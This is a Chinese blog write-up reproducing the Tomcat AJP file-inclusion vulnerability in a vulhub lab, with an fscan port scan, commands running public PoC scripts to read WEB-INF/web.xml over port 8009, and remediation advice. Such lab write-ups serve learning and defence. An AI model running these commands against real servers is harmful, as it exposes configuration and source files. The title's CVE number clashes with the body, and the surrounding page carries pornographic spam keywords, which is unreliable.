国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

關于CVE-2020-1983:Tomcat 文件包含漏洞的問題

瀏覽:227日期:2023-03-19 16:52:01
目錄
  • 一、靶場環境
    • 1、漏洞:任意文件包含
    • 2、影響版本
  • 二、搭建環境
    • 1、啟動環境
    • 2、訪問
    • 3、漏洞利用
    • 4、修復建議

起序:漏掃完看報告的時候發現的,復現學習一下。

一、靶場環境

使用的是 github 上的 vulhub 環境。Tomcat 版本為 9.0.30

1、漏洞:任意文件包含

攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件、源代碼等。

2、影響版本

  • Apache Tomcat 9.x < 9.0.31
  • Apache Tomcat 8.x < 8.5.51
  • Apache Tomcat 7.x < 7.0.100
  • Apache Tomcat 6.x

二、搭建環境

1、啟動環境

自行安裝 vulhub。

# Run environment		運行環境docker-compose up -d

2、訪問

http://192.168.2.129:8080/

3、漏洞利用

端口掃描,使用 fscan 掃描一下這個 ip 開啟的端口。可以看出這個 ip 對應的服務器開啟了 8080 和 8009 端口。

fscan -h 192.168.2.129

下載下面的 POC 腳本(腳本內容應該是一樣的)。我剛開始一直使用 python3,一直報錯,然后抱著試試看的態度使用 python2,MD,成功了,真坑啊,主要是我太菜了。(咱就是妥妥的腳本小子)

# CVE-2020-1938python2 CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 192.168.2.129# CNVD-2020-10487-Tomcat-Ajp-lfipython2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.2.129 -p 8009 -f WEB-INF/web.xml

4、修復建議

臨時禁用 AJP 協議端口,在 conf/server.xml 配置文件中注釋掉:<Connector port="8009" protocol="AJP/1.3"redirectPort="8443" />配置 AJP 配置中的 secretRequired 跟 secret 屬性來限制認證下載更新版本。

到此這篇關于CVE-2020-1983:Tomcat 文件包含漏洞的文章就介紹到這了,更多相關Tomcat 文件包含漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: Tomcat
主站蜘蛛池模板: 欧美一级特黄视频 | 亚洲欧美日韩国产一区二区精品 | 久久99精品视香蕉蕉 | 国产性生活 | 在线观看的黄网 | 亚洲干综合 | 天堂精品高清1区2区3区 | 一级aaa级毛片午夜在线播放 | 高清国产一区 | 精品一区二区三区的国产在线观看 | 国产午夜久久影院 | 毛片在线视频 | 99国产精品免费观看视频 | 特级毛片全部免费播放a一级 | 久久93精品国产91久久综合 | 精品国产91在线网 | 自拍偷自拍亚洲精品10p | 国产日韩欧美综合一区二区三区 | 亚洲精选在线观看 | 成人综合在线视频 | 国产欧美日韩另类 | 成人99国产精品一级毛片 | 国产亚洲精品久久综合影院 | 国产精品视频久 | 亚洲午夜久久久久影院 | 加勒比一本大道香蕉在线视频 | 国产亚洲精品精品国产亚洲综合 | 免费看成人播放毛片 | 亚洲欧美人妖另类激情综合区 | 热er99久久6国产精品免费 | 亚洲国产精品视频 | 国产真实搭讪系列 | 亚洲精品国自产拍在线观看 | 性猛交毛片 | 精品一区二区三区在线播放 | 欧美性猛交xxxxbbb | 日本一区二区三区不卡在线视频 | 免费毛片a线观看 | avhd101天天看新片 | 亚欧视频在线 | 国产亚洲精品久久麻豆 |